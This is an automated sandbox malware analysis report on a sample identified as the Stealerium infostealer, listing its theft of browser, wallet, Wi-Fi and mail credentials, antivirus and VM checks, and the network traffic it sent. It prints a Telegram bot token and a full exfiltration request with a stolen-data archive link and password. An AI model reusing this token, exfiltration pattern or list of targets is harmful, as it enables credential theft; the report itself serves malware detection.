Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 5276

Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: uyz4YPUyc9.exe, type: SAMPLE

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Queries volume information: C:\Users\user\Desktop\uyz4YPUyc9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: uyz4YPUyc9.exe, 00000000.00000002.2307463800.000001D8382FA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Stealerium

Source: Yara match	File source: uyz4YPUyc9.exe, type: SAMPLE
Source: Yara match	File source: 0.0.uyz4YPUyc9.exe.1d836200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2307839115.000001D8389AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D838846000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D838AEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uyz4YPUyc9.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH.zip, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uyz4YPUyc9.exe PID: 5276, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 4com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'C:\Users\user\AppData\Roaming\Binance2
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: uyz4YPUyc9.exe, type: SAMPLE
Source: Yara match	File source: 0.0.uyz4YPUyc9.exe.1d836200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uyz4YPUyc9.exe PID: 5276, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealerium

Source: Yara match	File source: uyz4YPUyc9.exe, type: SAMPLE
Source: Yara match	File source: 0.0.uyz4YPUyc9.exe.1d836200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2307839115.000001D8389AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D838846000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D838AEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uyz4YPUyc9.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH.zip, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uyz4YPUyc9.exe PID: 5276, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	131 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	111 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Obfuscated Files or Information	1 Input Capture	124 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	241 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	1 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
uyz4YPUyc9.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
uyz4YPUyc9.exe	100%	Avira	TR/AVI.Stealerium.ecpqm
uyz4YPUyc9.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://szurubooru.zulipchat.com	0%	Avira URL Cloud	safe
http://szurubooru.zulipchat.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
szurubooru.zulipchat.com	3.210.246.148	true	false	high
raw.githubusercontent.com	185.199.108.133	true	false	high
api.telegram.org	149.154.167.220	true	false	high
api.gofile.io	45.112.123.126	true	false	high
store5.gofile.io	31.14.70.244	true	false	high
icanhazip.com	104.16.184.241	true	false	high
180.182.11.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/getMe	false	high
https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage?chat_id=1386072644&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%206%3A28%3A02%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20767668%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20MKU_6MO7%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%8D%93%20%2APorn%20websites%2A%20%28No%20data%29%0A%0A%F0%9F%8C%90%20%2ABrowsers%3A%2A%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History%3A%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%F0%9F%97%83%20%2ASoftware%3A%2A%0A%0A%F0%9F%A7%AD%20%2ADevice%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%F0%9F%A6%A0%20%2AInstallation%3A%2A%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Startup%20disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Clipper%20not%20installed%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Keylogger%20not%20installed%0A%0A%F0%9F%93%84%20%2AFile%20Grabber%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2020%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%2030%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FGyFZhD%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%22ee6368278fe03ac91c5f409f73928818%22%60%60%60&parse_mode=Markdown&disable_web_page_preview=True	false	high
http://icanhazip.com/	false	high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt	false	high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt	false	high
https://szurubooru.zulipchat.com/api/v1/messages	false	high
https://api.gofile.io/servers	false	high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt	false	high
https://store5.gofile.io/uploadfile	false	high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt	false	high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt	false	high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high
https://duckduckgo.com/ac/?q=	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high
https://github.com/dotnet/runtime8	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838493000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high
https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.gofile.io/	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/runtime	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/	uyz4YPUyc9.exe	false		high
https://aka.ms/dotnet-warnings/	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high
https://aka.ms/serializationformat-binary-obsolete	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/binaryformatter	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/	uyz4YPUyc9.exe, 00000000.00000002.2316412793.000001D852793000.00000004.00000020.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store5.gofile.io	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://icanhazip.com	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838846000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.gofile.io	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage?chat_id=13860	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838733000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/JamesNK/Newtonsoft.Json	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.gofile.io	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high
https://github.com/kgnfth	uyz4YPUyc9.exe	false		high
https://github.com/icsharpcode/SharpZipLib	uyz4YPUyc9.exe, 00000000.00000002.2314206876.000001D850FE0000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gofile.io/d/GyFZhD	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838486000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high
https://www.ecosia.org/newtab/	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high
http://szurubooru.zulipchat.com	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8387AD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmp20C7.tmp.dat.0.dr	false		high
https://gofile.io/d/GyFZhD)	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8387A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://james.newtonking.com/projects/json	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high
https://szurubooru.zulipchat.com	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	tmp20C7.tmp.dat.0.dr	false		high
https://store5.gofile.io/X	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.nuget.org/packages/Newtonsoft.Json.Bson	uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store5.gofile.io	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	tmp20C7.tmp.dat.0.dr	false		high
http://api.telegram.org	uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.16.184.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
45.112.123.126	api.gofile.io	Singapore	16509	AMAZON-02US	false
31.14.70.244	store5.gofile.io	Virgin Islands (BRITISH)	199483	LINKER-ASFR	false
3.210.246.148	szurubooru.zulipchat.com	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565207
Start date and time:	2024-11-29 12:27:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	uyz4YPUyc9.exe renamed because original name is a hash value
Original Sample Name:	0382fe4590a7ed87d9edaeb970a5322d8e0c9c44f1f6b9f2528b5a3668755e3d.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@27/82@10/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 77% Number of executed functions: 290 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target uyz4YPUyc9.exe, PID 5276 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: uyz4YPUyc9.exe

Simulations

Behavior and APIs

Time	Type	Description
06:28:03	API Interceptor	187x Sleep call for process: uyz4YPUyc9.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse
	8FloezlGW7.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse
